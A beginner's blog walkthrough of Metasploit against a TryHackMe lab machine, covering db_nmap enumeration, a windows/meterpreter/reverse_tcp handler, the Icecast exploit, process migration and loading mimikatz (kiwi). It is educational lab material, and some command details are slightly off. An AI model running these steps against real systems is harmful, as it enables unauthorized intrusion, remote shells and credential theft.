METASPLOIT For Beginners

Hello, Friend! Metasploit has been the holy grail of security tools for some years now. It can be used by almost anyone, whether you’re a script kiddie or an expert. That’s why I will be going through a walkthrough today to show you the full exploitation process on Metasploit. This walkthrough is heavily influenced by the Metasploit room on TryHackMe, I highly recommend you check out the free room after this article. 

This article assumes that you have used a Linux terminal before, but I will be going through everything to help you through every part of the process. The first step we need is to load up the Metasploit database from the PostgreSQL server. This is done in the terminal with the command  service start postgresql.  While it is possible to use Metasploit without PostgreSQL, some features of Metasploit will no be available without PostgreSQL.  

This image has an empty alt attribute; its file name is chRxFxBMDBwb1S-Ls6cPvh26_QQqx6ct48M75YyXVy2OTKqwQ2zD_Ml-1o57EkrMrR7iLE4HaMyaofa_gVIrMFg0CS5d4gGfnBVq2lQibTBp5i3eoEw-i9cFbhHj8Hw8LREtPVZv

Once our PostgreSQL server is initialized, we can now start using Metasploit. Sidenote, if you are using versions older than Metasploit 5, you also have to use the msfdb init to initialize the Metasploit database. However, Metasploit 5 and above automatically initiate our database. As of July 5, 2021, the latest version of Metasploit is Version 6.0.47 

This image has an empty alt attribute; its file name is QTjoRhvr2RO_dsGYRkR953vBN3Nm3r0EzRJaINNY4PbhbjTdNzuSwW2_sni8D0RGBLFW1IULQmfMIsfLmu8rliKMXQVLfwnMURUDmh89q6F3aweIfEtFRPlkOBeUkV7lacxo9Kvx

And now to the fun parts! It’s time to start up Metasploit. We start Metasploit by typing in the simple command on our terminal, msfconsole.    

This image has an empty alt attribute; its file name is q3ae158GA-nJSYREKMFPTFESlLqvxIn5aENaM4Vxj1X3fkH_3QbWvRmpmLU4DvjPZZ9PvnrjkD2nJgfDdpQIPqW7Fd5gHZ_ElkDSItCogOQptahT27m1NWkcpy8Y-k5oXdkritl5

Once you’re in Metasploit, the one advice I’d give which is also coincidentally one word, EXPLORE! There are so many uses for Metasploit that you can be proficient in it just by exploring what’s inside it. We can get most of the syntax of Metasploit simply by using the helpcommand. For example, I love that there is a db_nmapcommand that gives us access to Nmap within Metasploit. This presents the opportunity to use two powerful tools together. Now back to the point, we can go ahead with our walkthrough and start exploiting a machine. 

For my example, I will be using a TryHackMe machine to take you through the process. The first thing we need to know when using Metasploit is modules. A module is a piece of software that can perform a specific action, such as scanning or exploiting. Now in full truth, Metasploit has six modules. The six popular modules are Exploit, Payload, Encoder, No OPeration(NOP), Post, and Auxiliary. Modules in Metasploit can be loaded by the load command. If you want to read more about modules, I suggest the Metasploit documentation, which can be found here.

Back to our objective, we can now start exploiting our machine. I will be using a TryHackMe machine for this demonstration. The machine IP is 10.10.7.158. 

The first step is to enumerate our machine, we can do this using db_nmap. 

This image has an empty alt attribute; its file name is lUH7w-P3_r46WJZAFSNnqhIHPm-7zfR4IqC0GuPwM2krPWGPYAYK3SQvSD_dBFZAi90cDPsE4CFDJWFKA2JONU1bvGbOeH1q3BGXuGzoni29Nyztlfz8uKJSLeQig5DgkimpONHZ

Here we can see that Microsoft Windows RPC is open on port 135, and we’ll make that our target. We can now try connecting to our machine with a payload. The payload we need for this particular machine is called multi/handler. So we can search it in our shell by using the search multi/handler command. Once we have found our payload, we can now use it. To use it, we would have to type in this complicated command called use. See, hacking is easy! While we can write the whole name of the payload, we can just use the number given to us in our search under the # column. In this case, we can say use 5.

This image has an empty alt attribute; its file name is 7BrPf-2NN0vYbfW5_k1GXBk2U9ZEa_8E8PNpj5PkH5QL_warfttV5hCH3ValfiuHHcvBzE1SOA82eHmXQh2l1r3jK1cSI9LfSHvkToueW3K0m-V8rgEXw8_Mbh9jS8PgR4hGXTUg

On we go! We can now set the configured payload(windows/meterpreter/reverse_tcp) and our IP address(In this case, my TryHackMe IP address) referred to as LHOST. Once we configure this, we can go on to our exploit, which is called Icecast. To do this, we can use the command use icecast

This image has an empty alt attribute; its file name is KJrmZcoz5Yrn0NKx6kB4LK7evLebpzGnFEu2k3SfQfs1-qHR2mo_iLRkfo5T8lGntip7FOGKQ4P3vZaoGc8SpYdEr4bipOUTpNLVMY45ch607yqeAVTlSfHIfcva11JNmSpIUqua

Almost there! Now, we just set our target IP(RHOSTS) and our IP address(LHOST). One more command and we’re in. we have to type in exploit or run -jso we can exploit our machine. Once we do that, we can check if we have exploited our machine by typing in the sessions command. We can also interact with any session using the sessions -i Session_Numbercommand. 

This image has an empty alt attribute; its file name is Lso3GM_HLFWxhPoVs2jiEPg2BAe4QnKoqfM-5-onCJoiZdeat1Y5IM1XI2hwXIe2oYZS0zdU3QP2mRY42Vzi_eeNDAOG4xwlgabZki0iW_Fzzu-FPm4EqqOm8AplmlXciVoA4tzu

We’re in! We can now explore our machine through the meterpreter shell. As you can see, the first command I used is the help command because it can help us understand the commands we can use. However, we can’t do much before escalating our privileges. In this demonstration, we’re going to use the spool service to gain our privilege. To find the process  ID of our spool service, we can use the pscommand. Once we find the process ID, we can use the migrate command to escalate our privilege.

This image has an empty alt attribute; its file name is Bl8fwmFZb4fEy8eL9VcE5D93JuGKbpyllQjzzKbe5FT_c3HsKyqaBif_qwwXqTf1OGYCmjjLJHFu_S9QSXsraHSsj5rXpWVd-Hjtbeg_qzSLyhtMo-w5k24E1DJ319BbBEXnDyt2

Since this doesn’t work, we can make use of mimikatz. We can load mimikatz using the load kiwi command. Once we load mimikatz, we can use the getprivs command to gain privileges.

This image has an empty alt attribute; its file name is 71Vnal80IPYpiS1eo__J3xHNudfjZvtaqump13ZKnaxYGI9Dsr8-sjAYqq-wHBzBMJ6MkjMR7knqV1eB4hPbaI3IdmbcJniwMKeAKCELtMp7o5DJO8nuzOyKubAbayPN4QNeI9Gu

 Our work is done after this command! Have fun with your machine and remember, KEEP EXPLORING!  

Zablon Shewangizaw

June 19, 2021

HackHouse.net Author